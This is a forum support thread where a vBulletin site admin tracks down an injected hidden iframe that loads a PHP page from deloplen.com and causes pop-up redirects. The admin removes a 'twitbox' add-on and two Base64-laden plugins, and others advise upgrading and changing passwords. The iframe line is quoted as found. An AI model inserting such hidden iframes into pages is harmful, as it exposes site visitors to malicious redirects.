[MrHorror]

So we're running vb4.1.10 and I used chrome to inspect our page. Found this iframe:

<iframe src="//deloplen.com/fac.php" style="display: none;"></iframe>
#document

I need to remove it but have no idea where it's located. I checked multiple templates. Any ideas?

[In Omnibus]

The most likely source is going to be a third party modification. Having said that vBulletin 4.1.1 is extremely outdated and has countless security holes which have been patched since its release. Is there a particular reason you're running that version? It would be advisable to upgrade to version 4.2.5 unless you have a compelling reason for keeping that version.

[MrHorror]

We’re running the patched version. We’re not planning on upgrading to 4.1.2 because we put so much work into skinning 4.1.10. Which was a pain to begin with. As for mods, we turned all plugins off and we still get pop up redirects from this site. Its cookie is also constantly found in our cookies list. Do you have any idea as to what template this code might be present in? Can iframe be executed from any template? It seems to be positioned in the body of the forum. Where would I find those templates. I’ve already combed:

Forum head
Forum header
All css templates
Forum footer

and a few others.

--------------- Added 08 Nov 2019 at 05:58 ---------------

Also since the source seems to be a php file, is it possible I could find the source of this malware in my vbulletin files in my file manager? I’ve read this same malware has been used on some wordpress forums and the source was discovered inside wordpress functions.php file.

[Dave]

It's really hard to say from our position. It can be anywhere from the database (datastore), any template (that is then injected into another template through injected code) or filesystem (.js or .php files).

[Mark.B]

There could be multiple unpatched security issues in a version that old. It really isn't plausible to secure it without upgrading. You would at the very least need to find a third party code auditor and pay them to audit the code for security flaws. Even then, if they aren't familiar with vBulletin code, there are no guarantees.

Outside of the navbar and activity stream there aren't major styling changes between 4.1.10 and 4.2.5. Rather than spend hours pouring over code hoping to find flaws, it would be far more efficient and a better use of time to upgrade to 4.2.5 and sort any styling problems out.

[MrHorror]

Okay so doing some further inspecting? This code seems to be located in the body wrapper. Right above this: <!-- closing div for body_wrapper -->

So now I need to know what templates in my style manager give me access to editing the body wrapper?

[MrHorror]

Good news guys. I removed an add-on in our forum for 'twitbox,' an active twitter box that appears on the right side of the page so users can read our tweets. I scrubbed the code from multiple style templates and now...No more popups! The deloplen cookie is also gone completely.

[markhendo1986]

Hi MrHorror,
I'm now experiencing the exact same issue as yourself with regards to spam delopen links opening in new tabs when clicking anything within the forum. I can see these links within an iFrame when inspecting the home page but like yourself, I'm not able to find out exactly which templates I need to clean to get rid of them.
Could you advise which templates were affected?
PS - To confirm, I do have the latest patched version of release v4.

[MrHorror]

Hi. Do you have twitbox installed?

[markhendo1986]

No, I don't have Twitbox. So was it just code from that plugin that you had to remove from your templates?

[MrHorror]

Yeah. I basically combed all of the templates where the twitbox code was present and I deleted that code from all of my styles. I also deleted two suspicious plugins marked 'vbulletin' that had long strings of code marked 'Base 64.'

[x iJailBreak x]

Originally Posted by MrHorror

Yeah. I basically combed all of the templates where the twitbox code was present and I deleted that code from all of my styles. I also deleted two suspicious plugins marked 'vbulletin' that had long strings of code marked 'Base 64.'

Just in case you haven't already, I highly recommend updating all of your passwords. I would also inform your community that you have been hacked and that they should ensure they have updated their passwords, especially if they aren't using unique passwords for different sites.